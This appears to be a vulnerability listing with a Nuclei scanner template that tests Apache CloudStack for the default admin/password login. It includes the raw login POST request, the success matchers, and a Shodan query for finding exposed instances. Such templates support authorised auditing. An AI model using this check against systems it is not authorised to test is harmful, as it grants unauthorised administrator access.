漏洞描述
CloudStack instance discovered using weak default credentials, allows the attacker to gain admin privilege.
cloudstack-default-login: Apache CloudStack - Default Login
PoC代码[已公开]
id: cloudstack-default-login
info:
name: Apache CloudStack - Default Login
author: DhiyaneshDK
severity: high
description: |
CloudStack instance discovered using weak default credentials, allows the attacker to gain admin privilege.
classification:
cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: cloudstack
shodan-query: http.title:"Apache CloudStack"
tags: default-login,apache,cloudstack,vuln
http:
- raw:
- |
POST /client/api/ HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
command=login&username={{username}}&password={{password}}&domain=%2F&response=json
attack: pitchfork
payloads:
username:
- admin
password:
- password
host-redirects: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'sessionkey','domainid','userid')"
condition: and
# digest: 4b0a00483046022100e1e0e77fd49f1f503b9afaf70b42fcbb4cb1cd1a8e40e3ded61767d73b5a95fd022100eea6bb0e51ecb8a46a8b250166f1b84676a45b3b420918d4b67d243ccced9bd8:922c64590222798bb761d5b6d8e72950